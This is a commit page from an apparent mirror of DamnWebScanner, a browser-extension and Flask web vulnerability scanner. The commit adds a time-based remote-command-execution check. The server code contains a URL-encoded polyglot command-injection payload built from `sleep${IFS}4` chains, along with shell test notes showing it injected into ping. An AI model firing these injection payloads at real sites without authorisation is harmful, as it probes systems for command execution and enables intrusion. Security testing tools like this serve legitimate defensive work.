swisskyrepo
/
DamnWebScanner
mirror of https://github.com/swisskyrepo/DamnWebScanner.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

RCE scanner added - TODO: Bugfix

master
swisskyrepo 2016-12-27 22:40:20 +01:00
parent 71b589dbb7
commit 50975cde2d
6 changed files with 71 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
Plugin/background.js
View File

@ -33,6 +33,7 @@ function send_target(server, url, deep, impact){
http.onreadystatechange = function() { http.onreadystatechange = function() {
if (http.readyState == XMLHttpRequest.DONE) { if (http.readyState == XMLHttpRequest.DONE) {
http_data = JSON.parse(http.responseText); http_data = JSON.parse(http.responseText);
console.log(http.responseText);
// Notifications and update local storage // Notifications and update local storage
if (http_data.xss != '0'){ if (http_data.xss != '0'){
@ -88,6 +89,23 @@ function send_target(server, url, deep, impact){
})(); })();
} }
if (http_data.rce != '0'){
// Update RCE count
chrome.storage.sync.get(['rce'], function(items) {
chrome.storage.sync.set({'rce': items['rce']+parseInt(http_data.rce)})
});
// Update vulnerabilities URL list
chrome.storage.sync.get(['list'], function(items) {
chrome.storage.sync.set({'list': items['list']+http_data.list})
});
new Notification('New vulnerability detected !', {
icon: 'icon.png',
body: 'RCE on '+extract_domain(unescape(url))
})();
}
} }
} }
http.open("GET", infos, true); http.open("GET", infos, true);
@ -95,7 +113,7 @@ function send_target(server, url, deep, impact){
} }
// Set a clean local storage // Set a clean local storage
chrome.storage.sync.set({'xss': 0, 'sql': 0, 'lfi': 0, 'work': 0, 'list':'' }) chrome.storage.sync.set({'rce':0, 'xss': 0, 'sql': 0, 'lfi': 0, 'work': 0, 'list':'' })
// Launch a scan when the tab change // Launch a scan when the tab change
chrome.tabs.onActivated.addListener(function(activeInfo) { chrome.tabs.onActivated.addListener(function(activeInfo) {

1
Plugin/popup.html
View File

@ -56,6 +56,7 @@
<li><span id='xss'>0 Cross Site Scripting</span></li> <li><span id='xss'>0 Cross Site Scripting</span></li>
<li><span id='sql'>0 Injection SQL</span></li> <li><span id='sql'>0 Injection SQL</span></li>
<li><span id='lfi'>0 Local File Inclusion</span></li> <li><span id='lfi'>0 Local File Inclusion</span></li>
<li><span id='rce'>0 Remote Commands Execution</span></li>
</ul> </ul>
<span id='total'>Total : 0 vulnerability found</span> <span id='total'>Total : 0 vulnerability found</span>

5
Plugin/popup.js
View File

@ -87,7 +87,7 @@ document.addEventListener('DOMContentLoaded', function() {
getCurrentTab(function(tab) { getCurrentTab(function(tab) {
// Display local storage // Display local storage
chrome.storage.sync.get(['xss','sql','lfi','list','work'], function(items) { chrome.storage.sync.get(['rce', 'xss','sql','lfi','list','work'], function(items) {
// Update start button // Update start button
if (items['work'] == 0){ if (items['work'] == 0){
@ -127,10 +127,11 @@ document.addEventListener('DOMContentLoaded', function() {
); );
// Display vulnerabilities' count // Display vulnerabilities' count
document.getElementById("rce").textContent = items['rce'] + " Remote Commands Execution";
document.getElementById("xss").textContent = items['xss'] + " Cross Site Scripting"; document.getElementById("xss").textContent = items['xss'] + " Cross Site Scripting";
document.getElementById("sql").textContent = items['sql'] + " Injection SQL"; document.getElementById("sql").textContent = items['sql'] + " Injection SQL";
document.getElementById("lfi").textContent = items['lfi'] + " Local File Inclusion"; document.getElementById("lfi").textContent = items['lfi'] + " Local File Inclusion";
document.getElementById("total").textContent = "Total : "+ (items['lfi']+items['xss']+items['sql']) +" vulnerability found"; document.getElementById("total").textContent = "Total : "+ (items['lfi']+items['xss']+items['sql']+items['rce']) +" vulnerability found";
}); });
// Display infos (URL - Server's availability) // Display infos (URL - Server's availability)

1
Plugin/vulns.html
View File

@ -84,6 +84,7 @@
<li><span id='xss'>0 Cross Site Scripting</span></li> <li><span id='xss'>0 Cross Site Scripting</span></li>
<li><span id='sql'>0 Injection SQL</span></li> <li><span id='sql'>0 Injection SQL</span></li>
<li><span id='lfi'>0 Local File Inclusion</span></li> <li><span id='lfi'>0 Local File Inclusion</span></li>
<li><span id='rce'>0 Remote Commands Execution</span></li>
</ul> </ul>
</div> </div>

7
README.md
View File

@ -46,11 +46,10 @@ var config_server = "http://127.0.0.1:8000";
- Should detect target in source code.. (list of targets, then launch scan) - Should detect target in source code.. (list of targets, then launch scan)
- Should detect and work with POST requests - Should detect and work with POST requests
- Export function for vulnerabilities - Export function for vulnerabilities
- Add some functions from https://sergeybelove.ru/one-button-scan/result/3004e0b978f19e58e3239087d119742779e1efbc/
- Deep and impact : args['url'],args['deep'],args['impact'] - Deep and impact : args['url'],args['deep'],args['impact']
- Command injection :&sleep 5&'\"0&sleep 5&`' - Launch scan when a button is clicked/ form submitted / page opened via URL - chrome.tabs.onActivated.addListener
- Launch scan when a button is clicked/ form submitted / page opened via URL - Cookies and User Agent in server request
- LFI scan improvement with data: wrapper - BUG multiples vulns not added
## Thanks ## Thanks
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) - Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)

46
Server/server.py
View File

@ -87,6 +87,7 @@ def scan_sql_blind_time(vulns, url, fuzz):
else: else:
print "\t\t\033[94mTime Based SQLi (", name ,") Failed \033[0m for ", fuzz, " with the payload :", payload print "\t\t\033[94mTime Based SQLi (", name ,") Failed \033[0m for ", fuzz, " with the payload :", payload
"""scan_lfi """scan_lfi
Description: will scan every parameter for LFI, checking for the common root:x:0:0 Description: will scan every parameter for LFI, checking for the common root:x:0:0
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
@ -104,6 +105,45 @@ def scan_lfi(vulns, url, fuzz):
print "\t\t\033[94mLFI Failed \033[0m for ", fuzz, " with the payload :", payload, inject print "\t\t\033[94mLFI Failed \033[0m for ", fuzz, " with the payload :", payload, inject
"""scan_rce
Description: use a polyglot vector to detect a RCE based on the response time
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
"""
def scan_rce(vulns, url, fuzz):
""" Some tests of context
$ time (ping -c 3 127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ) - real 0m4.113s
ping: unknown host 127.0.0.1|sleep
4|
$ time (ping -c 3 '127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ') - real 0m4.012s
ping: unknown host 127.0.0.1`#
`"|sleep${IFS}4|";sleep${IFS}4  : commande introuvable
$ time (ping -c 3 "127.0.0.1`#'|sleep${IFS}4|'`"|sleep${IFS}4|";sleep${IFS}4 ") - real 0m4.008s
;sleep
4  : commande introuvable
"""
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4 "
payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4%20"
# Do a request and check the response time
inject = url.replace(fuzz+"=", fuzz+"="+payload)
time1 = datetime.datetime.now()
content = requests.get(inject).text
time2 = datetime.datetime.now()
diff = time2 - time1
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
# The payload will force a delay of 5s at least.
if diff > 2:
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload
vulns['rce'] += 1
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
else:
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload
""" Route /ping """ Route /ping
Description: Simple ping implementation to check if the server is up via the extension Description: Simple ping implementation to check if the server is up via the extension
""" """
@ -117,7 +157,7 @@ Description: main route for the flask application, every scan is launched from h
""" """
@app.route('/',methods=['GET']) @app.route('/',methods=['GET'])
def index(): def index():
vulns = {'xss': 0, 'sql': 0, 'lfi': 0, 'list':''} vulns = {'rce': 0, 'xss': 0, 'sql': 0, 'lfi': 0, 'list':''}
# Parse requests - extract arguments # Parse requests - extract arguments
args = request.args args = request.args
@ -130,12 +170,14 @@ def index():
# Launch scans # Launch scans
for fuzz in matches: for fuzz in matches:
print "\n---[ New parameter : "+fuzz+" ]---" print "\n---[ New parameter " + fuzz + " for url: " + url + " ]---"
scan_xss(vulns, url, fuzz) scan_xss(vulns, url, fuzz)
scan_lfi(vulns, url, fuzz) scan_lfi(vulns, url, fuzz)
scan_sql_error(vulns, url, fuzz) scan_sql_error(vulns, url, fuzz)
scan_sql_blind_time(vulns, url, fuzz) scan_sql_blind_time(vulns, url, fuzz)
scan_rce(vulns, url, fuzz)
print vulns
# Display results as a json # Display results as a json
return jsonify(vulns) return jsonify(vulns)